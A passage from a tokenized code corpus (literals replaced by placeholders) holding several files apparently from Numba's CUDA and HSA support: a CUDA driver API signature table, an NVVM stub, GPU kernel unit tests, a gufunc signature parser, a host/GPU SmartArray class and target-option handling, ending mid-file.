cu_device_ptr , c_void_p , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , c_void_p , c_size_t , <EOL> cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , cu_device_ptr , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , cu_device_ptr , c_size_t , <EOL> cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , cu_device_ptr , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , cu_device_ptr , c_size_t , <EOL> cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_stream ) , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_function , c_uint , c_uint , c_uint , <EOL> c_uint , c_uint , c_uint , c_uint , cu_stream , <EOL> POINTER ( c_void_p ) , POINTER ( c_void_p ) ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , c_size_t , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , c_size_t , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device_ptr ) , <EOL> c_void_p , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_size_t ) , POINTER ( c_size_t ) ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_event ) , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , cu_event ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_float ) , cu_event , cu_event ) , <EOL> '<STR_LIT>' : ( c_int , cu_event ) , <EOL> '<STR_LIT>' : ( c_int , cu_event , cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_event ) , <EOL> '<STR_LIT>' : ( c_int , cu_stream , cu_event , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , c_uint , cu_device_ptr ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( cu_device_ptr ) , <EOL> POINTER ( c_size_t ) , <EOL> cu_device_ptr ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_uint ) , <EOL> c_void_p ) , <EOL> '<STR_LIT>' : ( c_int , ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> c_uint , POINTER ( cu_jit_option ) , <EOL> POINTER ( c_void_p ) , 
POINTER ( cu_link_state ) ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> cu_link_state , cu_jit_input_type , c_void_p , <EOL> c_size_t , c_char_p , c_uint , POINTER ( cu_jit_option ) , <EOL> POINTER ( c_void_p ) ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> cu_link_state , cu_jit_input_type , c_char_p , c_uint , <EOL> POINTER ( cu_jit_option ) , POINTER ( c_void_p ) ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> cu_link_state , POINTER ( c_void_p ) , POINTER ( c_size_t ) ) , <EOL> '<STR_LIT>' : ( c_int , cu_link_state ) , <EOL> '<STR_LIT>' : ( c_int , ) , <EOL> '<STR_LIT>' : ( c_int , ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , cu_function_attribute , cu_function ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , cu_function , c_size_t , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , cu_function , c_size_t , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , POINTER ( c_int ) , cu_function , cu_occupancy_b2d_size , c_size_t , c_int ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , POINTER ( c_int ) , cu_function , cu_occupancy_b2d_size , c_size_t , c_int , c_uint ) , <EOL> } </s>
<s> '''<STR_LIT>''' <EOL> class NvvmSupportError ( ImportError ) : <EOL> pass <EOL> class NVVM ( object ) : <EOL> def __init__ ( self ) : <EOL> raise NvvmSupportError ( '<STR_LIT>' ) <EOL> CompilationUnit = None <EOL> llvm_to_ptx = None <EOL> set_cuda_kernel = None <EOL> fix_data_layout = None <EOL> get_arch_option = None <EOL> SUPPORTED_CC = None <EOL> LibDevice = None <EOL> NvvmError = None <EOL> def is_available ( ) : <EOL> return False </s>
<s> import numpy as np <EOL> from numba import from_dtype , cuda <EOL> from numba import unittest_support as unittest <EOL> from numba . cuda . testing import skip_on_cudasim <EOL> class TestAlignment ( unittest . TestCase ) : <EOL> def test_record_alignment ( self ) : <EOL> rec_dtype = np . dtype ( [ ( '<STR_LIT:a>' , '<STR_LIT>' ) , ( '<STR_LIT:b>' , '<STR_LIT>' ) ] , align = True ) <EOL> rec = from_dtype ( rec_dtype ) <EOL> @ cuda . jit ( ( rec [ : ] , ) ) <EOL> def foo ( a ) : <EOL> i = cuda . grid ( <NUM_LIT:1> ) <EOL> a [ i ] . a = a [ i ] . b <EOL> a_recarray = np . recarray ( <NUM_LIT:3> , dtype = rec_dtype ) <EOL> for i in range ( a_recarray . size ) : <EOL> a_rec = a_recarray [ i ] <EOL> a_rec . a = <NUM_LIT:0> <EOL> a_rec . b = ( i + <NUM_LIT:1> ) * <NUM_LIT> <EOL> foo [ <NUM_LIT:1> , <NUM_LIT:3> ] ( a_recarray ) <EOL> self . assertTrue ( np . all ( a_recarray . a == a_recarray . b ) ) <EOL> @ skip_on_cudasim ( '<STR_LIT>' ) <EOL> def test_record_alignment_error ( self ) : <EOL> rec_dtype = np . dtype ( [ ( '<STR_LIT:a>' , '<STR_LIT>' ) , ( '<STR_LIT:b>' , '<STR_LIT>' ) ] ) <EOL> rec = from_dtype ( rec_dtype ) <EOL> with self . assertRaises ( Exception ) as raises : <EOL> @ cuda . jit ( ( rec [ : ] , ) ) <EOL> def foo ( a ) : <EOL> i = cuda . grid ( <NUM_LIT:1> ) <EOL> a [ i ] . a = a [ i ] . b <EOL> self . assertTrue ( '<STR_LIT>' in str ( raises . exception ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , absolute_import , division <EOL> import numpy as np <EOL> import time <EOL> from numba import cuda , config , float64 , void <EOL> from numba . cuda . testing import unittest <EOL> if config . ENABLE_CUDASIM : <EOL> tpb = <NUM_LIT:4> <EOL> else : <EOL> tpb = <NUM_LIT:16> <EOL> SM_SIZE = tpb , tpb <EOL> class TestCudaLaplace ( unittest . TestCase ) : <EOL> def test_laplace_small ( self ) : <EOL> @ cuda . jit ( float64 ( float64 , float64 ) , device = True , inline = True ) <EOL> def get_max ( a , b ) : <EOL> if a > b : <EOL> return a <EOL> else : <EOL> return b <EOL> @ cuda . jit ( void ( float64 [ : , : ] , float64 [ : , : ] , float64 [ : , : ] ) ) <EOL> def jocabi_relax_core ( A , Anew , error ) : <EOL> err_sm = cuda . shared . array ( SM_SIZE , dtype = float64 ) <EOL> ty = cuda . threadIdx . x <EOL> tx = cuda . threadIdx . y <EOL> bx = cuda . blockIdx . x <EOL> by = cuda . blockIdx . y <EOL> n = A . shape [ <NUM_LIT:0> ] <EOL> m = A . shape [ <NUM_LIT:1> ] <EOL> i , j = cuda . grid ( <NUM_LIT:2> ) <EOL> err_sm [ ty , tx ] = <NUM_LIT:0> <EOL> if j >= <NUM_LIT:1> and j < n - <NUM_LIT:1> and i >= <NUM_LIT:1> and i < m - <NUM_LIT:1> : <EOL> Anew [ j , i ] = <NUM_LIT> * ( A [ j , i + <NUM_LIT:1> ] + A [ j , i - <NUM_LIT:1> ] + A [ j - <NUM_LIT:1> , i ] + A [ j + <NUM_LIT:1> , i ] ) <EOL> err_sm [ ty , tx ] = Anew [ j , i ] - A [ j , i ] <EOL> cuda . syncthreads ( ) <EOL> t = tpb // <NUM_LIT:2> <EOL> while t > <NUM_LIT:0> : <EOL> if ty < t : <EOL> err_sm [ ty , tx ] = get_max ( err_sm [ ty , tx ] , err_sm [ ty + t , tx ] ) <EOL> t //= <NUM_LIT:2> <EOL> cuda . syncthreads ( ) <EOL> t = tpb // <NUM_LIT:2> <EOL> while t > <NUM_LIT:0> : <EOL> if tx < t and ty == <NUM_LIT:0> : <EOL> err_sm [ ty , tx ] = get_max ( err_sm [ ty , tx ] , err_sm [ ty , tx + t ] ) <EOL> t //= <NUM_LIT:2> <EOL> cuda . 
syncthreads ( ) <EOL> if tx == <NUM_LIT:0> and ty == <NUM_LIT:0> : <EOL> error [ by , bx ] = err_sm [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> if config . ENABLE_CUDASIM : <EOL> NN , NM = <NUM_LIT:4> , <NUM_LIT:4> <EOL> iter_max = <NUM_LIT:20> <EOL> else : <EOL> NN , NM = <NUM_LIT> , <NUM_LIT> <EOL> iter_max = <NUM_LIT:1000> <EOL> A = np . zeros ( ( NN , NM ) , dtype = np . float64 ) <EOL> Anew = np . zeros ( ( NN , NM ) , dtype = np . float64 ) <EOL> n = NN <EOL> m = NM <EOL> tol = <NUM_LIT> <EOL> error = <NUM_LIT:1.0> <EOL> for j in range ( n ) : <EOL> A [ j , <NUM_LIT:0> ] = <NUM_LIT:1.0> <EOL> Anew [ j , <NUM_LIT:0> ] = <NUM_LIT:1.0> <EOL> timer = time . time ( ) <EOL> iter = <NUM_LIT:0> <EOL> blockdim = ( tpb , tpb ) <EOL> griddim = ( NN // blockdim [ <NUM_LIT:0> ] , NM // blockdim [ <NUM_LIT:1> ] ) <EOL> error_grid = np . zeros ( griddim ) <EOL> stream = cuda . stream ( ) <EOL> dA = cuda . to_device ( A , stream ) <EOL> dAnew = cuda . to_device ( Anew , stream ) <EOL> derror_grid = cuda . to_device ( error_grid , stream ) <EOL> while error > tol and iter < iter_max : <EOL> self . assertTrue ( error_grid . dtype == np . float64 ) <EOL> jocabi_relax_core [ griddim , blockdim , stream ] ( dA , dAnew , derror_grid ) <EOL> derror_grid . copy_to_host ( error_grid , stream = stream ) <EOL> stream . synchronize ( ) <EOL> error = np . abs ( error_grid ) . max ( ) <EOL> tmp = dA <EOL> dA = dAnew <EOL> dAnew = tmp <EOL> iter += <NUM_LIT:1> <EOL> runtime = time . time ( ) - timer <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from numba . testing import SerialSuite <EOL> from numba . testing import load_testsuite <EOL> import os <EOL> from numba import config <EOL> def load_tests ( loader , tests , pattern ) : <EOL> return SerialSuite ( load_testsuite ( loader , os . path . dirname ( __file__ ) ) ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> DATALAYOUT = { <EOL> <NUM_LIT:64> : ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } <EOL> TRIPLE = "<STR_LIT>" <EOL> if os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) not in [ '<STR_LIT:0>' , '<STR_LIT>' , '<STR_LIT:false>' ] : <EOL> from . import libhlc as hlc </s>
<s> from __future__ import print_function , absolute_import <EOL> import numpy as np <EOL> from numba import unittest_support as unittest <EOL> from numba . hsa . vectorizers import HsaGUFuncVectorize <EOL> from numba . hsa . dispatch import HSAGenerializedUFunc <EOL> from numba import guvectorize <EOL> def ufunc_add_core ( a , b , c ) : <EOL> for i in range ( c . size ) : <EOL> c [ i ] = a [ i ] + b [ i ] <EOL> class TestGUFuncBuilding ( unittest . TestCase ) : <EOL> def test_gufunc_building ( self ) : <EOL> ufbldr = HsaGUFuncVectorize ( ufunc_add_core , "<STR_LIT>" ) <EOL> ufbldr . add ( "<STR_LIT>" ) <EOL> ufbldr . add ( "<STR_LIT>" ) <EOL> ufunc = ufbldr . build_ufunc ( ) <EOL> self . assertIsInstance ( ufunc , HSAGenerializedUFunc ) <EOL> A = np . arange ( <NUM_LIT:100> , dtype = np . intp ) <EOL> B = np . arange ( <NUM_LIT:100> , dtype = np . intp ) + <NUM_LIT:1> <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_equal ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . intp ) , got . dtype ) <EOL> A = A . reshape ( <NUM_LIT:50> , <NUM_LIT:2> ) <EOL> B = B . reshape ( <NUM_LIT:50> , <NUM_LIT:2> ) <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_equal ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . intp ) , got . dtype ) <EOL> A = A . reshape ( <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:2> ) <EOL> B = B . reshape ( <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:2> ) <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_equal ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . intp ) , got . dtype ) <EOL> A = np . arange ( <NUM_LIT:100> , dtype = np . float32 ) <EOL> B = np . arange ( <NUM_LIT:100> , dtype = np . 
float32 ) + <NUM_LIT:1> <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_allclose ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . float32 ) , got . dtype ) <EOL> A = A . reshape ( <NUM_LIT:50> , <NUM_LIT:2> ) <EOL> B = B . reshape ( <NUM_LIT:50> , <NUM_LIT:2> ) <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_allclose ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . float32 ) , got . dtype ) <EOL> def test_gufunc_building_scalar_output ( self ) : <EOL> def sum_row ( inp , out ) : <EOL> tmp = <NUM_LIT:0.> <EOL> for i in range ( inp . shape [ <NUM_LIT:0> ] ) : <EOL> tmp += inp [ i ] <EOL> out [ <NUM_LIT:0> ] = tmp <EOL> ufbldr = HsaGUFuncVectorize ( sum_row , "<STR_LIT>" ) <EOL> ufbldr . add ( "<STR_LIT>" ) <EOL> ufunc = ufbldr . build_ufunc ( ) <EOL> inp = np . arange ( <NUM_LIT> , dtype = np . int32 ) . reshape ( <NUM_LIT:100> , <NUM_LIT:3> ) <EOL> out = ufunc ( inp ) <EOL> for i in range ( inp . shape [ <NUM_LIT:0> ] ) : <EOL> np . testing . assert_equal ( inp [ i ] . sum ( ) , out [ i ] ) <EOL> def test_gufunc_scalar_input_saxpy ( self ) : <EOL> def axpy ( a , x , y , out ) : <EOL> for i in range ( out . shape [ <NUM_LIT:0> ] ) : <EOL> out [ i ] = a * x [ i ] + y [ i ] <EOL> ufbldr = HsaGUFuncVectorize ( axpy , '<STR_LIT>' ) <EOL> ufbldr . add ( "<STR_LIT>" ) <EOL> saxpy = ufbldr . build_ufunc ( ) <EOL> A = np . float32 ( <NUM_LIT:2> ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:5> ) : <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> exp = A * X [ j , i ] + Y [ j , i ] <EOL> self . assertTrue ( exp == out [ j , i ] ) <EOL> X = np . 
arange ( <NUM_LIT:10> , dtype = np . float32 ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:10> ) : <EOL> exp = A * X [ j ] + Y [ j ] <EOL> self . assertTrue ( exp == out [ j ] , ( exp , out [ j ] ) ) <EOL> A = np . arange ( <NUM_LIT:5> , dtype = np . float32 ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:5> ) : <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> exp = A [ j ] * X [ j , i ] + Y [ j , i ] <EOL> self . assertTrue ( exp == out [ j , i ] , ( exp , out [ j , i ] ) ) <EOL> class TestGUFuncDecor ( unittest . TestCase ) : <EOL> def test_gufunc_decorator ( self ) : <EOL> @ guvectorize ( [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' , target = '<STR_LIT>' ) <EOL> def saxpy ( a , x , y , out ) : <EOL> for i in range ( out . shape [ <NUM_LIT:0> ] ) : <EOL> out [ i ] = a * x [ i ] + y [ i ] <EOL> A = np . float32 ( <NUM_LIT:2> ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:5> ) : <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> exp = A * X [ j , i ] + Y [ j , i ] <EOL> self . assertTrue ( exp == out [ j , i ] ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:10> ) : <EOL> exp = A * X [ j ] + Y [ j ] <EOL> self . assertTrue ( exp == out [ j ] , ( exp , out [ j ] ) ) <EOL> A = np . arange ( <NUM_LIT:5> , dtype = np . float32 ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . 
reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:5> ) : <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> exp = A [ j ] * X [ j , i ] + Y [ j , i ] <EOL> self . assertTrue ( exp == out [ j , i ] , ( exp , out [ j , i ] ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import absolute_import , print_function , division <EOL> import tokenize <EOL> import string <EOL> from numba import utils <EOL> def parse_signature ( sig ) : <EOL> '''<STR_LIT>''' <EOL> def stripws ( s ) : <EOL> return '<STR_LIT>' . join ( c for c in s if c not in string . whitespace ) <EOL> def tokenizer ( src ) : <EOL> def readline ( ) : <EOL> yield src <EOL> gen = readline ( ) <EOL> return tokenize . generate_tokens ( lambda : next ( gen ) ) <EOL> def parse ( src ) : <EOL> tokgen = tokenizer ( src ) <EOL> while True : <EOL> tok = next ( tokgen ) <EOL> if tok [ <NUM_LIT:1> ] == '<STR_LIT:(>' : <EOL> symbols = [ ] <EOL> while True : <EOL> tok = next ( tokgen ) <EOL> if tok [ <NUM_LIT:1> ] == '<STR_LIT:)>' : <EOL> break <EOL> elif tok [ <NUM_LIT:0> ] == tokenize . NAME : <EOL> symbols . append ( tok [ <NUM_LIT:1> ] ) <EOL> elif tok [ <NUM_LIT:1> ] == '<STR_LIT:U+002C>' : <EOL> continue <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % tok [ <NUM_LIT:1> ] ) <EOL> yield tuple ( symbols ) <EOL> tok = next ( tokgen ) <EOL> if tok [ <NUM_LIT:1> ] == '<STR_LIT:U+002C>' : <EOL> continue <EOL> elif tokenize . ISEOF ( tok [ <NUM_LIT:0> ] ) : <EOL> break <EOL> elif tokenize . ISEOF ( tok [ <NUM_LIT:0> ] ) : <EOL> break <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % tok [ <NUM_LIT:1> ] ) <EOL> ins , _ , outs = stripws ( sig ) . partition ( '<STR_LIT>' ) <EOL> inputs = list ( parse ( ins ) ) <EOL> outputs = list ( parse ( outs ) ) <EOL> isym = set ( ) <EOL> osym = set ( ) <EOL> for grp in inputs : <EOL> isym |= set ( grp ) <EOL> for grp in outputs : <EOL> osym |= set ( grp ) <EOL> diff = osym . difference ( isym ) <EOL> if diff : <EOL> raise NameError ( '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( sorted ( diff ) ) ) <EOL> return inputs , outputs </s>
<s> from numba . tracing import trace <EOL> import numpy <EOL> import sys <EOL> def _o2s ( dtype , shape , order ) : <EOL> if dtype is None or shape is None or order is None : <EOL> return None <EOL> if order == '<STR_LIT:F>' : <EOL> shape = list ( shape ) <EOL> shape . reverse ( ) <EOL> strides = [ ] <EOL> itemsize = dtype . itemsize <EOL> for i in range ( len ( shape ) , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> strides . append ( itemsize ) <EOL> itemsize *= shape [ i - <NUM_LIT:1> ] <EOL> if order in ( '<STR_LIT:C>' , None ) : <EOL> strides . reverse ( ) <EOL> return tuple ( strides ) <EOL> def _s2o ( dtype , shape , strides ) : <EOL> if strides is None or strides [ - <NUM_LIT:1> ] == dtype . itemsize : <EOL> order = '<STR_LIT:C>' <EOL> elif strides [ <NUM_LIT:0> ] == dtype . itemsize : <EOL> order = '<STR_LIT:F>' <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> s2 = _o2s ( dtype , shape , order ) <EOL> if strides != s2 : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return order <EOL> class SmartArray ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , obj = None , copy = True , <EOL> shape = None , dtype = None , order = None , where = '<STR_LIT:host>' ) : <EOL> """<STR_LIT>""" <EOL> assert where in ( '<STR_LIT:host>' , '<STR_LIT>' ) <EOL> assert obj is not None or ( shape and dtype ) <EOL> self . _host = self . _gpu = None <EOL> self . _host_valid = self . _gpu_valid = False <EOL> self . _allocate ( where , obj , dtype , shape , _o2s ( dtype , shape , order ) , copy ) <EOL> if where == '<STR_LIT:host>' : <EOL> self . _host_valid = True <EOL> t = self . _host <EOL> else : <EOL> self . _gpu_valid = True <EOL> t = self . _gpu <EOL> self . _shape = t . shape <EOL> self . _strides = t . strides <EOL> self . _dtype = t . dtype <EOL> self . _ndim = t . ndim <EOL> self . _size = t . size <EOL> @ property <EOL> def shape ( self ) : return self . _shape <EOL> @ property <EOL> def strides ( self ) : return self . 
_strides <EOL> @ property <EOL> def dtype ( self ) : return self . _dtype <EOL> @ property <EOL> def ndim ( self ) : return self . _ndim <EOL> @ property <EOL> def size ( self ) : return self . _size <EOL> def host ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _sync ( '<STR_LIT:host>' ) <EOL> return self . _host <EOL> def host_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _invalidate ( '<STR_LIT>' ) <EOL> if self . _gpu is not None and sys . getrefcount ( self . _gpu ) > <NUM_LIT:2> : <EOL> self . _sync ( '<STR_LIT>' ) <EOL> def gpu ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _sync ( '<STR_LIT>' ) <EOL> return self . _gpu <EOL> def gpu_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _invalidate ( '<STR_LIT:host>' ) <EOL> if self . _host is not None and sys . getrefcount ( self . _host ) > <NUM_LIT:2> : <EOL> self . _sync ( '<STR_LIT:host>' ) <EOL> def __array__ ( self , * args ) : <EOL> self . _sync ( '<STR_LIT:host>' ) <EOL> return numpy . array ( self . _host , * args ) <EOL> def _sync ( self , where ) : <EOL> """<STR_LIT>""" <EOL> if where == '<STR_LIT>' : <EOL> if self . _gpu is None : <EOL> self . _allocate ( '<STR_LIT>' , None , self . dtype , self . shape , self . strides ) <EOL> if not self . _gpu_valid : <EOL> self . _copy_to_gpu ( ) <EOL> else : <EOL> if self . _host is None : <EOL> self . _allocate ( '<STR_LIT:host>' , None , self . dtype , self . shape , self . strides ) <EOL> if not self . _host_valid : <EOL> self . _copy_to_host ( ) <EOL> @ trace <EOL> def _invalidate ( self , where ) : <EOL> """<STR_LIT>""" <EOL> if where == '<STR_LIT>' : <EOL> self . _gpu_valid = False <EOL> else : <EOL> self . _host_valid = False <EOL> @ trace <EOL> def _allocate ( self , where , obj = None , dtype = None , shape = None , strides = None , <EOL> copy = True ) : <EOL> if dtype : <EOL> dtype = numpy . dtype ( dtype ) <EOL> if where == '<STR_LIT:host>' : <EOL> if obj is not None : <EOL> self . _host = numpy . 
array ( obj , dtype , copy = copy ) <EOL> else : <EOL> self . _host = numpy . empty ( shape , dtype , _s2o ( dtype , shape , strides ) ) <EOL> else : <EOL> from numba . cuda . cudadrv import devicearray as da <EOL> if obj is not None : <EOL> if not isinstance ( obj , numpy . ndarray ) : <EOL> obj = numpy . array ( obj , copy = False ) <EOL> self . _gpu = da . from_array_like ( obj ) <EOL> else : <EOL> if strides is None : <EOL> strides = _o2s ( dtype , shape , '<STR_LIT:C>' ) <EOL> self . _gpu = da . DeviceNDArray ( shape , strides , dtype ) <EOL> @ trace <EOL> def _copy_to_gpu ( self ) : <EOL> self . _gpu . copy_to_device ( self . _host ) <EOL> self . _gpu_valid = True <EOL> @ trace <EOL> def _copy_to_host ( self ) : <EOL> self . _gpu . copy_to_host ( self . _host ) <EOL> self . _host_valid = True <EOL> @ staticmethod <EOL> def _maybe_wrap ( value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , numpy . ndarray ) : <EOL> return SmartArray ( value , copy = False ) <EOL> else : <EOL> return value <EOL> @ trace <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if self . _host is None : <EOL> self . _allocate ( '<STR_LIT:host>' , None , self . dtype , self . shape , self . strides ) <EOL> return self . _maybe_wrap ( getattr ( self . _host , name ) ) <EOL> def __len__ ( self ) : return self . shape [ <NUM_LIT:0> ] <EOL> def __eq__ ( self , other ) : <EOL> if type ( self ) is not type ( other ) : return False <EOL> return self . _maybe_wrap ( self . host ( ) == other . host ( ) ) <EOL> def __getitem__ ( self , * args ) : <EOL> return self . _maybe_wrap ( self . host ( ) . __getitem__ ( * args ) ) <EOL> def __setitem__ ( self , * args ) : <EOL> return self . _maybe_wrap ( self . host ( ) . __setitem__ ( * args ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division , absolute_import <EOL> class TargetOptions ( object ) : <EOL> OPTIONS = { } <EOL> def __init__ ( self ) : <EOL> self . values = { } <EOL> def from_dict ( self , dic ) : <EOL> for k , v in dic . items ( ) : <EOL> try : <EOL> ctor = self . OPTIONS [ k ] <EOL> except KeyError : <EOL> fmt = "<STR_LIT>" <EOL> raise KeyError ( fmt % k ) <EOL> else : <EOL> self . values [ k ] = ctor ( v ) <EOL> @ classmethod <EOL> def parse_as_flags ( cls , flags , options ) : <EOL> opt = cls ( ) <EOL> opt . from_dict ( options ) <EOL> opt . set_flags ( flags ) <EOL> return flags <EOL> def set_flags ( self , flags ) : <EOL> """<STR_LIT>""" <EOL> kws = self . values . copy ( ) <EOL> if kws . pop ( '<STR_LIT>' , False ) == False : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( "<STR_LIT>" , False ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , True ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , False ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , True ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , False ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , False ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , False ) : <EOL> flags . set ( '<STR_LIT>' ) <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws : <EOL> raise NameError ( "<STR_LIT>" % kws . keys ( ) ) </s>
<s> from __future__ import print_function , absolute_import , division <EOL> from numba import unittest_support as unittest <EOL> import numpy as np <EOL> from numba import njit <EOL> from numba . npyufunc import dufunc <EOL> from . . support import MemoryLeakMixin <EOL> def pyuadd ( a0 , a1 ) : <EOL> return a0 + a1 <EOL> class TestDUFunc ( MemoryLeakMixin , unittest . TestCase ) : <EOL> def nopython_dufunc ( self , pyfunc ) : <EOL> return dufunc . DUFunc ( pyfunc , targetoptions = dict ( nopython = True ) ) <EOL> def test_frozen ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> self . assertFalse ( duadd . _frozen ) <EOL> duadd . _frozen = True <EOL> self . assertTrue ( duadd . _frozen ) <EOL> with self . assertRaises ( ValueError ) : <EOL> duadd . _frozen = False <EOL> with self . assertRaises ( TypeError ) : <EOL> duadd ( np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:10> ) , np . linspace ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:10> ) ) <EOL> def test_scalar ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> self . assertEqual ( pyuadd ( <NUM_LIT:1> , <NUM_LIT:2> ) , duadd ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_npm_call ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> @ njit <EOL> def npmadd ( a0 , a1 , o0 ) : <EOL> duadd ( a0 